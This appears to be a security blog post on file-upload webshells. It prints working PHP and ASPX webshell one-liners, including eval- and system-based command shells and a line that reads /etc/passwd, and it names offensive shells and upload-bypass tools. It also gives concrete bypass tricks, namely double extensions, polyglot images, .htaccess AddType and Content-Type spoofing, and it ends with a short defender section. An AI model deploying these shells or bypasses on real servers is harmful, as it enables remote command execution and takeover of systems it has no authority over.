• Posted by: Eng. Donya Bino
• February 08, 2026

File Upload Webshells: PHP & ASP Tools & Practical Bypass

File upload vulnerabilities (CWE-434) let attackers drop webshells, small scripts that provide remote command execution, file management, and persistence on a web server. Once uploaded and executed (via HTTP), they turn a simple flaw into full server control.

Attackers and red teams still favor PHP (most common on Apache/Nginx) and ASP/ASPX (on IIS/Windows servers). The goal is usually unrestricted upload leading to RCE.

Reasons That File Upload → Webshell is Important 
1. Real-world Effect: Successfully uploading once results in continuous access to victim’s computer. Once that is done, attackers are able to identify the logged in user with the ‘whoami’ command, retrieve files from the victim’s computer, perform lateral movement within the victim’s organization, and deploy ransomware against the victim’s organization.
2. Common Access: User profile images, uploaded documents, avatars and poorly validated CMS plugins; provide an attacker with a method to upload a file to the webserver.
3. Real-world Examples: Weak filter bypass → file transfer → privilege escalation → lateral movement; this was observed with Clop, LockBit and RansomHub.

Classic Minimal Webshells 
PHP Examples (Most common from current use): 
1. Basic command execution: <?php system($_GET['cmd']); ?> Access: shell.php?cmd=whoami → returns current user.
2. File read: <?php echo file_get_contents('/etc/passwd'); ?>
3. Versatile mini-shell: <?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?>
4. China Chopper style (tiny, popular in 2025 campaigns): <?php @eval($_POST['pass']); ?> (Auth via password in POST, then eval arbitrary PHP.)

ASP/ASPX Examples (Windows/IIS):
1. Basic cmd: <%@ Page Language="C#" %><% Response.Write(new System.Diagnostics.ProcessStartInfo("cmd.exe","/c "+Request["cmd"]).StandardOutput.ReadToEnd()); %> Access: shell.aspx?cmd=whoami
2. Eval-style: <%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["c"]); %>
These are dropped via Burp/ZAP intercept or curl.

The following tools can be deployed using Burp/ZAP interception or curl commands to assist in abuse of upload filter devices:
1. Upload_Bypass:  (GitHub: sAjibuu/Upload_Bypass) is a Python command line interface (CLI) utility that assists with some methods of fuzzing upload filters, as well as providing an easy means of automating bypassing filter systems and delivering a payload across various file formats (PHP/ASP/JSP).

Upload_Bypass provides support for the following filter bypass techniques: 
(1) Double extension attacks (for example, shell.php.jpg)
(2) Trailing dots
(3) Null bytes 
(4) MIME spoofing
(5) Polyglot files; etc.
(6) Test if an upload location is web-executable (by using the -r request.txt command for the location of the upload request).

2. PayloadsAllTheThings : Upload Insecure Files (GitHub: swisskyrepo/PayloadsAllTheThings) Massive list of bypass payloads for PHP/ASP. Includes .htaccess tricks, polyglot images with PHP code, magic bytes manipulation.

3. Webshells Found in Kali Linux: Web shells are useful tools for performing remote management on a compromised server. Kali Linux comes installed with a number of possible web shells under the folder "/usr/share/webshells/". In this directory, you will find two of the most popular PHP web shells: simple-php and php-reverse-shell, among many others.

4. China Chopper and Godzilla: China Chopper is a very small (4KB), low-level web shell that is also password protected and is commonly used by attackers to execute commands on compromised systems. Godzilla is a more sophisticated web shell that is capable of encrypting its traffic and can be used to execute commands written in a variety of programming languages including PHP, ASP, or JSP, and is only used to perform targeted intrusions. (These web shells should only be used in a lab environment.)

5. B374K, c99, and r57: All three of these web shells are typical "classic" types of PHP web shells that are still widely used in unauthorized scans of the public. All three web shells are completely functional with a full set of tools to manage files, execute commands, run SQL queries, and create back-connected sessions on the victim's system.

Real-World Bypass & Upload Scenarios 
1. Image upload → PHP shell Bypass: Rename shell.php → shell.jpg.php or shell.php;.jpg (Apache misconfig). Polyglot: GIF89a header + PHP code (valid image + executable).
2. Blacklist evasion Extensions: .php5, .phtml, .php7, .phar. Case: .PhP (Windows case-insensitive).
3. Content-type spoof Intercept Burp → change Content-Type: image/jpeg while filename ends in .php.
4. Abuse of .htaccess files on shared (PHP) servers Include Path Disclosure: Attackers upload .htaccess with AddType application/x-httpd-php .jpg directive, allowing attackers to run embedded PHP scripts from .jpg files.
5. Submitting files with path disclosure may provide attacker with exact submission process resulting in a successful HTTP access to http://target/uploads/shell.php.

Detection and Protection - For Defenders
1. Server Hardening
a) Disable dangerous functions with disable_functions = system, exec, passthru, shell_exec in php.ini.
b) For IIS, remove any script mappings for any extensions not in use.
c) Store uploads outside the web root and provide access through an application (script).

2. WAF / ModSecurity - block the most common patterns that indicate a webshell including eval(, system(, <?php.
3. Monitoring - Watch for web server processes spawning cmd.exe, powershell.exe or other unusual child processes.

Weak validation is the primary reason for webshells associated with file uploads. Start testing using one-liners and progress to fully featured tools but in a controlled manner and only for purposes sanctioned by an appropriate authorizing entity